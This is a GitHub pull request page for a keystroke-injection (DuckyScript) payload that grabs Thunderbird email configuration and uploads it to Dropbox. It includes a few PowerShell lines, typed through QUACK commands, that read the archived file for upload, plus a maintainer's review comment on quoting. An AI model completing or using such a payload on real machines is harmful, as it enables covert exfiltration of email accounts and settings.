Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Save Your Thunderbird Settings via Dropbox #687

Closed
wants to merge 7 commits into from

Conversation

aleff-github
Copy link

This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed.

I don't know if anyone else has uploaded the same thing in the past, so apologies if it already exists.

This payload is designed in order to make Thunderbird configuration extraction immediate so that you can work in speed.
@aleff-github aleff-github requested a review from hak5peaks June 11, 2024 10:39
QUACK STRING \$dropboxPath = \"$DROPBOX_FOLDER_PATH$ARCHIVE_NAME\"
QUACK ENTER
QUACK DELAY 500
QUACK STRING \$fileContent = [System.IO.File]::ReadAllBytes(\$filePath)
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

the arguments need to be quote wrapped

QUACK STRING  "\$fileContent = [System.IO.File]::ReadAllBytes(\$filePath)"

This is not the only instance of this issue in this payload. I'd suggest testing to identify the issues and resolve them.

@aleff-github aleff-github deleted the patch-66 branch June 14, 2024 20:14
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

2 participants